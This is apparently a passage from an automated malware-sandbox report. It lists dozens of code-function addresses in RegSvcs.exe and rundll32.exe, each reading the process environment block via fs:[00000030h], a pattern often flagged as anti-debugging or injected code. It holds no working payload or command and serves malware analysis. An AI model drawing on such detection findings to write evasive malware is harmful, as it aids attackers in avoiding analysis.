          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01619080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01693884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01693884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01643B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01643B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01644BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01644BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01644BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01621B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01621B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01642397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0165927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01654A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01654A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01628A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01615210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01615210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01615210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01615210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01633A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01642AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01642ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01653D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01693540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01637D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0169A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01644D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01644D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01644D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01641DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01641DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01641DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01642581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01642581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01642581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01642581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01612D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01612D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01612D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01612D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01612D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01696CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01614F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01614F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01628794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01697794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01697794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01697794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01648E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01658EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04410050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04410050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441746D mov eax, dword ptr fs:[00000030h]
